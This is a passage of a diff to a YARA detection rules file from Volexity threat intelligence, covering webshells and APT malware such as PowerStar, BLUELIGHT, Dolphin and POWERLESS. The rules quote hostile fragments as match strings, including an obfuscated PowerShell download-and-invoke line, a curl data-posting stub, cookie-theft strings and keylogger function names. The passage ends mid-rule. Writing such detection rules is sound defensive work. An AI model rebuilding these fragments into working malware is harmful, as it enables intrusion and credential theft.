-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2021/2021-08-17 - InkySquid Part 1/indicators/yara.yar#L78-L120"
+		id = "25b23a4c-8fc7-5d6f-b4b5-46fe2c1546d8"
+		date = "2021-03-01"
+		modified = "2024-07-30"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2021/2021-03-02 - Operation Exchange Marauder/indicators/yara.yar#L57-L88"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "45490dfc793bb95f153c0194989b25e0b2641fa9b9f6763d5733eab6483ffead"
+		hash = "2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a"
+		logic_hash = "5ec5e52922e97a3080d397b69b2f42f09daa995271e218ea085fa2ec4e3abad2"
 		score = 75
 		quality = 80
-		tags = "INKYPINE, FILE, MEMORY"
-		hash1 = "7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d"
-		hash2 = "94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a"
-		hash3 = "485246b411ef5ea9e903397a5490d106946a8323aaf79e6041bdf94763a0c028"
+		tags = "FILE, MEMORY"
 		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 5284
-		version = 12
+		rule_id = 4968
+		version = 5
 
 	strings:
-		$pdb1 = "\\Development\\BACKDOOR\\ncov\\"
-		$pdb2 = "Release\\bluelight.pdb" nocase ascii
-		$pdb3 = "D:\\Development\\GOLD-BACKDOOR\\Release\\FirstBackdoor.pdb"
-		$pdb4 = "GOLD-BACKDOOR\\Release\\"
-		$msg0 = "https://ipinfo.io" fullword
-		$msg1 = "country" fullword
-		$msg5 = "\"UserName\":\"" fullword
-		$msg7 = "\"ComName\":\"" fullword
-		$msg8 = "\"OS\":\"" fullword
-		$msg9 = "\"OnlineIP\":\"" fullword
-		$msg10 = "\"LocalIP\":\"" fullword
-		$msg11 = "\"Time\":\"" fullword
-		$msg12 = "\"Compiled\":\"" fullword
-		$msg13 = "\"Process Level\":\"" fullword
-		$msg14 = "\"AntiVirus\":\"" fullword
-		$msg15 = "\"VM\":\"" fullword
+		$uniq1 = "HttpCookie newcook = new HttpCookie(\"fqrspt\", HttpContext.Current.Request.Form"
+		$uniq2 = "ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE="
+		$s1 = "Result.InnerText = string.Empty;"
+		$s2 = "newcook.Expires = DateTime.Now.AddDays("
+		$s3 = "System.Diagnostics.Process process = new System.Diagnostics.Process();"
+		$s4 = "process.StandardInput.WriteLine(HttpContext.Current.Request.Form[\""
+		$s5 = "else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[\""
+		$s6 = "<input type=\"submit\" value=\"Upload\" />"
 
 	condition:
-		any of ( $pdb* ) or all of ( $msg* )
+		any of ( $uniq* ) or all of ( $s* )
 }
 rule VOLEXITY_Malware_Win_Backwash_Cpp : WHEELEDASH FILE MEMORY
 {
@@ -155302,79 +155770,6 @@ rule VOLEXITY_Malware_Win_Backwash_Iis : WHEELEDASH FILE MEMORY
 	condition:
 		all of ( $a* ) or any of ( $b* )
 }
-rule VOLEXITY_Webshell_Aspx_Regeorgtunnel : FILE MEMORY
-{
-	meta:
-		description = "A variation of the reGeorgtunnel open-source webshell."
-		author = "threatintel@volexity.com"
-		id = "b8aa27c9-a28a-5051-8f81-1184f28842ed"
-		date = "2021-03-02"
-		modified = "2024-10-18"
-		reference = "https://github.com/sensepost/reGeorg/blob/master/tunnel.aspx"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2021/2021-03-02 - Operation Exchange Marauder/indicators/yara.yar#L26-L56"
-		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		hash = "406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928"
-		logic_hash = "ea3d0532cb609682922469e8272dc8061efca3b3ae27df738ef2646e30404c6f"
-		score = 75
-		quality = 80
-		tags = "FILE, MEMORY"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "high"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 4979
-		version = 4
-
-	strings:
-		$s1 = "System.Net.Sockets"
-		$s2 = "System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get"
-		$t1 = ".Split('|')"
-		$t2 = "Request.Headers.Get"
-		$t3 = ".Substring("
-		$t4 = "new Socket("
-		$t5 = "IPAddress ip;"
-
-	condition:
-		all of ( $s* ) or all of ( $t* )
-}
-rule VOLEXITY_Apt_Webshell_Aspx_Sportsball : FILE MEMORY
-{
-	meta:
-		description = "The SPORTSBALL webshell, observed in targeted Microsoft Exchange attacks."
-		author = "threatintel@volexity.com"
-		id = "25b23a4c-8fc7-5d6f-b4b5-46fe2c1546d8"
-		date = "2021-03-01"
-		modified = "2024-07-30"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2021/2021-03-02 - Operation Exchange Marauder/indicators/yara.yar#L57-L88"
-		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		hash = "2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a"
-		logic_hash = "5ec5e52922e97a3080d397b69b2f42f09daa995271e218ea085fa2ec4e3abad2"
-		score = 75
-		quality = 80
-		tags = "FILE, MEMORY"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 4968
-		version = 5
-
-	strings:
-		$uniq1 = "HttpCookie newcook = new HttpCookie(\"fqrspt\", HttpContext.Current.Request.Form"
-		$uniq2 = "ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE="
-		$s1 = "Result.InnerText = string.Empty;"
-		$s2 = "newcook.Expires = DateTime.Now.AddDays("
-		$s3 = "System.Diagnostics.Process process = new System.Diagnostics.Process();"
-		$s4 = "process.StandardInput.WriteLine(HttpContext.Current.Request.Form[\""
-		$s5 = "else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[\""
-		$s6 = "<input type=\"submit\" value=\"Upload\" />"
-
-	condition:
-		any of ( $uniq* ) or all of ( $s* )
-}
 rule VOLEXITY_Apt_Malware_Win_Flipflop_Ldr : COZYLARCH FILE MEMORY
 {
 	meta:
@@ -155491,7 +155886,7 @@ rule VOLEXITY_Apt_Malware_Rb_Rokrat_Loader : INKYPINE FILE MEMORY
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
 		logic_hash = "30ae14fd55a3ab60e791064f69377f3b9de9b871adfd055f435df657f89f8007"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "INKYPINE, FILE, MEMORY"
 		hash1 = "5bc52f6c1c0d0131cee30b4f192ce738ad70bcb56e84180f464a5125d1a784b2"
 		os = "win"
@@ -155613,1193 +156008,1388 @@ rule VOLEXITY_Apt_Malware_Win_Rokload : INKYPINE FILE
 	condition:
 		$bytes00 at 0
 }
-rule VOLEXITY_Apt_Win_Powerstar_Persistence_Batch : CHARMINGKITTEN
+rule VOLEXITY_Apt_Malware_Win_Dolphin : INKYPINE FILE MEMORY
 {
 	meta:
-		description = "Detects the batch script used to persist PowerStar via Startup."
+		description = "North Korean origin malware which uses a custom Google App for c2 communications."
 		author = "threatintel@volexity.com"
-		id = "f3ed7b46-d80d-55b1-b6c7-6ea6569f199c"
-		date = "2023-05-16"
-		modified = "2023-09-20"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L1-L19"
+		id = "27bb2b41-f77d-5b95-b555-206c39ed9e6c"
+		date = "2021-06-21"
+		modified = "2025-01-27"
+		reference = "https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2021/2021-08-17 - InkySquid Part 1/indicators/yara.yar#L1-L77"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "9c3a45b759516959eae1cdf8e73bf540b682c90359a6232aa4782a8d1fe15b7d"
+		logic_hash = "785a92087efc816c88c6eed6363c432d8d45198fbd5cef84c04dabd36b6316a6"
 		score = 75
-		quality = 80
-		tags = "CHARMINGKITTEN"
-		hash1 = "9777f106ac62829cd3cfdbc156100fe892cfc4038f4c29a076e623dc40a60872"
-		memory_suitable = 1
+		quality = 55
+		tags = "INKYPINE, FILE, MEMORY"
+		hash1 = "837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 5593
+		version = 10
 
 	strings:
-		$s_1 = "e^c^h^o o^f^f"
-		$s_2 = "powershertxdll.ertxdxe"
-		$s_3 = "Get-Conrtxdtent -Prtxdath"
-		$s_4 = "%appdata%\\Microsrtxdoft\\Windortxdws\\"
-		$s_5 = "&(gcm i*x)$"
+		$magic = "host_name: %ls, cookie_name: %s, cookie: %s, CT: %llu, ET: %llu, value: %s, path: %ls, secu: %d, http: %d, last: %llu, has: %d"
+		$f1 = "%ls.INTEG.RAW" wide
+		$f2 = "edb.chk" ascii
+		$f3 = "edb.log" ascii
+		$f4 = "edbres00001.jrs" ascii
+		$f5 = "edbres00002.jrs" ascii
+		$f6 = "edbtmp.log" ascii
+		$f7 = "cheV01.dat" ascii
+		$chrome1 = "Failed to get chrome cookie"
+		$chrome2 = "mail.google.com, cookie_name: OSID"
+		$chrome3 = ".google.com, cookie_name: SID,"
+		$chrome4 = ".google.com, cookie_name: __Secure-3PSID,"
+		$chrome5 = "Failed to get Edge cookie"
+		$chrome6 = "google.com, cookie_name: SID,"
+		$chrome7 = "google.com, cookie_name: __Secure-3PSID,"
+		$chrome8 = "Failed to get New Edge cookie"
+		$chrome9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
+		$chrome10 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
+		$chrome11 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
+		$chrome12 = "https://mail.google.com"
+		$chrome13 = "result.html"
+		$chrome14 = "GM_ACTION_TOKEN"
+		$chrome15 = "GM_ID_KEY="
+		$chrome16 = "/mail/u/0/?ik=%s&at=%s&view=up&act=prefs"
+		$chrome17 = "p_bx_ie=1"
+		$chrome18 = "myaccount.google.com, cookie_name: OSID"
+		$chrome19 = "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3"
+		$chrome20 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
+		$chrome21 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
+		$chrome22 = "https://myaccount.google.com"
+		$chrome23 = "result.html"
+		$chrome24 = "myaccount.google.com"
+		$chrome25 = "/_/AccountSettingsUi/data/batchexecute"
+		$chrome26 = "f.req=%5B%5B%5B%22BqLdsd%22%2C%22%5Btrue%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at="
+		$chrome27 = "response.html"
+		$msg1 = "https_status is %s"
+		$msg2 = "Success to find GM_ACTION_TOKEN and GM_ID_KEY"
+		$msg3 = "Failed to find GM_ACTION_TOKEN and GM_ID_KEY"
+		$msg4 = "Failed HttpSendRequest to mail.google.com"
+		$msg5 = "Success to enable imap"
+		$msg6 = "Failed to enable imap"
+		$msg7 = "Success to find SNlM0e"
+		$msg8 = "Failed to find SNlM0e"
+		$msg9 = "Failed HttpSendRequest to myaccount.google.com"
+		$msg10 = "Success to enable thunder access"
+		$msg11 = "Failed to enable thunder access"
 
 	condition:
-		3 of them
+		$magic or ( all of ( $f* ) and 3 of ( $chrome* ) ) or 24 of ( $chrome* ) or 4 of ( $msg* )
 }
-rule VOLEXITY_Apt_Win_Powerstar_Memonly : CHARMINGKITTEN
+rule VOLEXITY_Apt_Malware_Win_Bluelight : INKYPINE FILE MEMORY
 {
 	meta:
-		description = "Detects the initial stage of the memory only variant of PowerStar."
+		description = "The BLUELIGHT malware family. Leverages Microsoft OneDrive for network communications."
 		author = "threatintel@volexity.com"
-		id = "469fc433-da9e-55ed-99fb-9560ec86a179"
-		date = "2023-05-16"
-		modified = "2023-09-20"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L20-L65"
+		id = "5bfdc74b-592e-5f3d-9fb8-bbbbd0f6f0f6"
+		date = "2021-04-23"
+		modified = "2025-02-18"
+		reference = "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2021/2021-08-17 - InkySquid Part 1/indicators/yara.yar#L78-L120"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "d790ff204e4e8adeb3e887d9ebce743e958b523c48317d017487b1b0c6aebc11"
+		logic_hash = "45490dfc793bb95f153c0194989b25e0b2641fa9b9f6763d5733eab6483ffead"
 		score = 75
-		quality = 78
-		tags = "CHARMINGKITTEN"
-		hash1 = "977cf5cc1d0c61b7364edcf397e5c67d910fac628c6c9a41cf9c73b3720ce67f"
-		memory_suitable = 1
+		quality = 80
+		tags = "INKYPINE, FILE, MEMORY"
+		hash1 = "7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d"
+		hash2 = "94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a"
+		hash3 = "485246b411ef5ea9e903397a5490d106946a8323aaf79e6041bdf94763a0c028"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 5284
+		version = 12
 
 	strings:
-		$s_1 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($in.substring(3)))"
-		$s_2 = "[Convert]::ToByte(([Convert]::ToString(-bnot ($text_bytes[$i])"
-		$s_3 = "$Exec=[System.Text.Encoding]::UTF8.GetString($text_bytes)"
-		$s_4 = "((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})"
-		$f_1 = "function Gorjol{"
-		$f_2 = "Borjol \"$"
-		$f_3 = "Gorjol -text"
-		$f_4 = "function Borjoly{"
-		$f_6 = "$filename = $env:APPDATA+\"\\Microsoft\\Windows\\DocumentPreview.pdf\";"
-		$f_7 = "$env:APPDATA+\"\\Microsoft\\Windows\\npv.txt\""
-		$f_8 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\brt8ts74e.bat"
-		$f_9 = "\\Microsoft\\Windows\\s7qe52.txt"
-		$f_10 = "$yeolsoe2 = $yeolsoe"
-		$f_11 = "setRequestHeader(\"Content-DPR\""
-		$f_12 = "getResponseHeader(\"Content-DPR\")"
-		$f_13 = {24 43 6f 6d 6d 61 6e 64 50 61 72 74 73 20 3d 24 53 65 73 73 69 6f 6e 52 65 73 70 6f 6e 73 65 2e 53 70 6c 69 74 28 22 b6 22 29}
-		$f_14 = "$language -like \"*shar*\""
-		$f_15 = "$language -like \"*owers*\""
-		$alias_1 = "(gcm *v????E?P?e*)"
-		$alias_2 = "&(gcm *ke-e*) $Command"
-		$key = "T2r0y1M1e1n1o0w1"
-		$args_1 = "$sem.Close()"
-		$args_2 = "$cem.Close()"
-		$args_3 = "$mem.Close()"
-		$command_1 = "_____numone_____"
-		$command_2 = "_____mac2_____"
-		$command_3 = "_____yeolsoe_____"
+		$pdb1 = "\\Development\\BACKDOOR\\ncov\\"
+		$pdb2 = "Release\\bluelight.pdb" nocase ascii
+		$pdb3 = "D:\\Development\\GOLD-BACKDOOR\\Release\\FirstBackdoor.pdb"
+		$pdb4 = "GOLD-BACKDOOR\\Release\\"
+		$msg0 = "https://ipinfo.io" fullword
+		$msg1 = "country" fullword
+		$msg5 = "\"UserName\":\"" fullword
+		$msg7 = "\"ComName\":\"" fullword
+		$msg8 = "\"OS\":\"" fullword
+		$msg9 = "\"OnlineIP\":\"" fullword
+		$msg10 = "\"LocalIP\":\"" fullword
+		$msg11 = "\"Time\":\"" fullword
+		$msg12 = "\"Compiled\":\"" fullword
+		$msg13 = "\"Process Level\":\"" fullword
+		$msg14 = "\"AntiVirus\":\"" fullword
+		$msg15 = "\"VM\":\"" fullword
 
 	condition:
-		2 of ( $s_* ) or any of ( $f_* ) or 2 of ( $alias_* ) or $key or all of ( $args_* ) or any of ( $command_* )
+		any of ( $pdb* ) or all of ( $msg* )
 }
-rule VOLEXITY_Apt_Win_Powerstar_Logmessage : CHARMINGKITTEN
+rule VOLEXITY_Apt_Malware_Vbs_Basicstar_A : CHARMINGCYPRESS FILE MEMORY
 {
 	meta:
-		description = "Detects interesting log message embedded in memory only version of PowerStar."
+		description = "VBS backdoor which bares architectural similarity to the POWERSTAR malware family."
 		author = "threatintel@volexity.com"
-		id = "5979c776-5138-50e2-adab-0793ad86ba76"
-		date = "2023-05-16"
-		modified = "2023-09-20"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L66-L79"
+		id = "e790defe-2bd5-5629-8420-ce8091483589"
+		date = "2024-01-04"
+		modified = "2025-05-21"
+		reference = "TIB-20240111"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L68-L98"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "539c9a8b3de24f2c8058d204900344756a8031822ebebc312612b8fb8422e341"
+		logic_hash = "977bb42553bb6585c8d0e1e89675644720ca9abf294eccd797e20d4bca516810"
 		score = 75
 		quality = 80
-		tags = "CHARMINGKITTEN"
-		memory_suitable = 1
+		tags = "CHARMINGCYPRESS, FILE, MEMORY"
+		hash1 = "c6f91e5585c2cbbb8d06b7f239e30b271f04393df4fb81815f6556fa4c793bb0"
+		os = "win"
+		os_arch = "all"
+		report2 = "TIB-20240126"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 10037
+		version = 8
 
 	strings:
-		$s_1 = "wau, ije ulineun mueos-eul halkkayo?"
+		$s1 = "Base64Encode(EncSess)" ascii wide
+		$s2 = "StrReverse(PlainSess)" ascii wide
+		$s3 = "ComDecode, \"Module\"" ascii wide
+		$s4 = "ComDecode, \"SetNewConfig\"" ascii wide
+		$s5 = "ComDecode, \"kill\"" ascii wide
+		$magic = "cmd /C start /MIN curl --ssl-no-revoke -s -d " ascii wide
 
 	condition:
-		all of them
+		3 of ( $s* ) or $magic
 }
-rule VOLEXITY_Apt_Win_Powerstar_Lnk : CHARMINGKITTEN
+rule VOLEXITY_Apt_Malware_Ps1_Powerless_B : CHARMINGCYPRESS FILE MEMORY
 {
 	meta:
-		description = "Detects LNK command line used to install PowerStar."
+		description = "Detects POWERLESS malware."
 		author = "threatintel@volexity.com"
-		id = "33f16283-69b9-5109-b723-3ddc8abb8c41"
-		date = "2023-05-16"
-		modified = "2023-09-20"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L80-L97"
+		id = "e62703b5-32fb-5ceb-9f21-f52a4871f3d9"
+		date = "2023-10-25"
+		modified = "2024-01-29"
+		reference = "TIB-20231027"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L99-L156"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "da53aeaf69e80f697068779f4741b8c23cff82dd1bfb0640916a1bcc98c4892f"
+		logic_hash = "eb9d199c1f7c2a42d711c1a44ab13526787169c18a77ce988568525baca043ef"
 		score = 75
-		quality = 80
-		tags = "CHARMINGKITTEN"
-		memory_suitable = 1
+		quality = 78
+		tags = "CHARMINGCYPRESS, FILE, MEMORY"
+		hash1 = "62de7abb39cf4c47ff120c7d765749696a03f4fa4e3e84c08712bb0484306ae1"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 9794
+		version = 5
 
 	strings:
-		$p_1 = "-UseBasicParsing).Content; &(gcm i*x)$"
-		$c_1 = "powershecde43ell.ecde43exe"
-		$c_2 = "wgcde43eet -Ucde43eri"
-		$c_3 = "-UseBasicde43ecParsing).Contcde43eent; &(gcm i*x)$"
+		$fun_1 = "function verifyClickStorke"
+		$fun_2 = "function ConvertTo-SHA256"
+		$fun_3 = "function Convert-Tobase" fullword
+		$fun_4 = "function Convert-Frombase" fullword
+		$fun_5 = "function Send-Httppacket"
+		$fun_6 = "function Generat-FetchCommand"
+		$fun_7 = "function Create-Fetchkey"
+		$fun_8 = "function Run-Uploader"
+		$fun_9 = "function Run-Shot" fullword
+		$fun_10 = "function ShotThis("
+		$fun_11 = "function File-Manager"
+		$fun_12 = "function zip-files"
+		$fun_13 = "function Run-Stealer"
+		$fun_14 = "function Run-Downloader"
+		$fun_15 = "function Run-Stro" fullword
+		$fun_16 = "function Run-Tele" fullword
+		$fun_17 = "function Run-Voice"
+		$s_1 = "if($commandtype -eq \"klg\")"
+		$s_2 = "$desrilizedrecievedcommand"
+		$s_3 = "$getAsyncKeyProto = @"
+		$s_4 = "$Global:BotId ="
+		$s_5 = "$targetCLSID = (Get-ScheduledTask | Where-Object TaskName -eq"
+		$s_6 = "$burl = \"$Global:HostAddress/"
+		$s_7 = "$hashString = [System.BitConverter]::ToString($hash).Replace('-','').ToLower()"
+		$s_8 = "$Global:UID = ((gwmi win32_computersystemproduct).uuid -replace '[^0-9a-z]').substring("
+		$s_9 = "$rawpacket = \"{`\"MId`\":`\"$Global:MachineID`\",`\"BotId`\":`\"$basebotid`\"}\""
+		$s_12 = "Runned Without any Error"
+		$s_13 = "$commandresponse = (Invoke-Expression $instruction -ErrorAction Stop) | Out-String"
+		$s_14 = "Operation started successfuly"
+		$s_15 = "$t_path = (Get-WmiObject Win32_Process -Filter \"name = '$process'\" | Select-Object CommandLine).CommandLine"
+		$s_16 = "?{ $_.DisplayName -match \"Telegram Desktop\" } | %{$app_path += $_.InstallLocation }"
+		$s_17 = "$chlids = get-ChildItem $t -Recurse -Exclude \"$t\\tdata\\user_data\""
+		$s_18 = "if($FirsttimeFlag -eq $True)"
+		$s_19 = "Update-Conf -interval $inter -url $url -next_url $next -conf_path $conf_path -key $config_key"
 
 	condition:
-		any of them
+		3 of ( $fun_* ) or any of ( $s_* )
 }
-rule VOLEXITY_Apt_Win_Powerstar_Decrypt_Function : CHARMINGKITTEN
+rule VOLEXITY_Apt_Malware_Macos_Vpnclient_Cc_Oct23 : CHARMINGCYPRESS FILE MEMORY
 {
 	meta:
-		description = "Detects PowerStar decrypt function, potentially downloaded standalone and then injected."
+		description = "Detection for fake macOS VPN client used by CharmingCypress."
 		author = "threatintel@volexity.com"
-		id = "1fbc2689-8169-53b1-b581-c41ab2b3a16f"
-		date = "2023-05-16"
-		modified = "2023-09-20"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L98-L121"
+		id = "e0957936-dc6e-5de6-bb23-d0ef61655029"
+		date = "2023-10-17"
+		modified = "2023-10-27"
+		reference = "TIB-20231027"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L245-L271"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "d022e363464488836a1c161f2b9c7463ac91ae6f60f14dfd574189233201c9aa"
+		logic_hash = "da5e9be752648b072a9aaeed884b8e1729a14841e33ed6633a0aaae1f11bd139"
 		score = 75
 		quality = 80
-		tags = "CHARMINGKITTEN"
-		hash1 = "b79d28fe5e3c988bb5aadb12ce442d53291dbb9ede0c7d9d64eec078beba5585"
-		memory_suitable = 1
+		tags = "CHARMINGCYPRESS, FILE, MEMORY"
+		hash1 = "11f0e38d9cf6e78f32fb2d3376badd47189b5c4456937cf382b8a574dc0d262d"
+		os = "darwin,linux"
+		os_arch = "all"
+		parent_hash = "31ca565dcbf77fec474b6dea07101f4dd6e70c1f58398eff65e2decab53a6f33"
+		scan_context = "file,memory"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 9770
+		version = 3
 
 	strings:
-		$f_1 = "function Borjol{"
-		$s_1 = "$global:Domain = \""
-		$s_2 = "$global:IP = \""
-		$s_3 = "$global:yeolsoe"
-		$s_4 = "$semii.Close()"
-		$s_5 = "$cemii.Close()"
-		$s_6 = "$memii.Close()"
+		$s1 = "networksetup -setsocksfirewallproxystate wi-fi off" ascii
+		$s2 = "networksetup -setsocksfirewallproxy wi-fi ___serverAdd___ ___portNum___; networksetup -setsocksfirewallproxystate wi-fi on" ascii
+		$s3 = "New file imported successfully." ascii
+		$s4 = "Error in importing the File." ascii
 
 	condition:
-		any of ( $f_* ) or 2 of ( $s_* )
+		2 of ( $s* )
 }
-rule VOLEXITY_Apt_Win_Powerstar : CHARMINGKITTEN
+rule VOLEXITY_Apt_Malware_Charmingcypress_Openvpn_Configuration : CHARMINGCYPRESS FILE
 {
 	meta:
-		description = "Custom PowerShell backdoor used by Charming Kitten."
+		description = "Detection for a .ovpn file used in a malicious VPN client on victim machines by CharmingCypress."
 		author = "threatintel@volexity.com"
-		id = "febcd23b-6545-571b-905d-18dffe8e913f"
-		date = "2021-10-13"
-		modified = "2023-09-20"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L122-L150"
+		id = "f39b2d7c-f0c5-5623-a114-02ba32469e59"
+		date = "2023-10-17"
+		modified = "2023-10-27"
+		reference = "TIB-20231027"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L272-L297"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "2cbf59eaee60a8f84b1ac35cec3b01592a2a0f56c92a2db218bb26a15be24bf3"
+		logic_hash = "f4c5f13ac75504b14def9c37d3a41c6eea4c45845d4b54c50030b1f00691e4bf"
 		score = 75
 		quality = 80
-		tags = "CHARMINGKITTEN"
-		hash1 = "de99c4fa14d99af791826a170b57a70b8265fee61c6b6278d3fe0aad98e85460"
-		memory_suitable = 1
+		tags = "CHARMINGCYPRESS, FILE"
+		hash1 = "d6d043973d8843a82033368c785c362f51395b1a1d475fa4705aff3526e15268"
+		parent_hash = "31ca565dcbf77fec474b6dea07101f4dd6e70c1f58398eff65e2decab53a6f33"
+		os = "all"
+		os_arch = "all"
+		scan_context = "file"
+		severity = "high"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 9769
+		version = 3
 
 	strings:
-		$appname = "[AppProject.Program]::Main()" ascii wide
-		$langfilters1 = "*shar*" ascii wide
-		$langfilters2 = "*owers*" ascii wide
-		$definitions1 = "[string]$language" ascii wide
-		$definitions2 = "[string]$Command" ascii wide
-		$definitions3 = "[string]$ThreadName" ascii wide
-		$definitions4 = "[string]$StartStop" ascii wide
-		$sess = "$session = $v + \";;\" + $env:COMPUTERNAME + $mac;" ascii wide
+		$remote = "remote-cert-tls server" ascii
+		$ip = "Ip: "
+		$tls = "<tls_auth>"
 
 	condition:
